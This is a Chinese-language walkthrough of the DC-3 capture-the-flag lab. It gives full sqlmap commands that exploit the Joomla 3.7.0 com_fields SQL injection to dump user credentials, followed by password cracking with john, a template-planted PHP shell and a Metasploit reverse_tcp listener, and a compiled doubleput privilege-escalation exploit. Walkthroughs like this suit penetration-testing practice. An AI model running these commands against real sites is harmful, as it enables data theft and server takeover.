DC3靶机渗透


信息收集

靶机地址

netdiscover -i eth0 -r 10.0.2.0/24

探测端口

开启端口

nmap -Pn -p1-65535 10.0.2.7

端口详细信息

nmap -T4 -A -sV -p80 10.0.2.7

探测网站信息

开源cms--Joomla

使用joomscan
下载:apt-get install joomscan
使用:joomscan -u http://10.0.2.7

发现版本为3.7.0
使用工具搜索该版本是否存在漏洞

打开42033.txt文件
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

提示使用SQLmap工具
sqlmap -u "http://10.0.2.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
获得所有数据库名

sqlmap -u "http://10.0.2.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
获得joomladb数据库中的所有表名

sqlmap -u "http://10.0.2.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users --columns -p list[fullordering]
获得#__users表中的所有的列名

sqlmap -u "http://10.0.2.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'name,password' --dump -p list[fullordering]
获得#__users表中name,password列的内容

破解密码
使用john工具

登录网站

Joomla后台可编辑模板,修改源码,我们利用这个功能,在template下面创建一个 hack.php


使用msf侦听

use exploit/multi/hander
set payload php/meterpreter/reverse_tcp
set lhost 10.0.2.4
set lport 3333
exploit

访问指定目录 成功连接shell

获得系统版本信息
存在本地提权漏洞

查看39772.txt文档

下载并解压EXP

tar -xvf exploit.tar

使用EXP
./compile.sh

./doubleput

获得flag

相关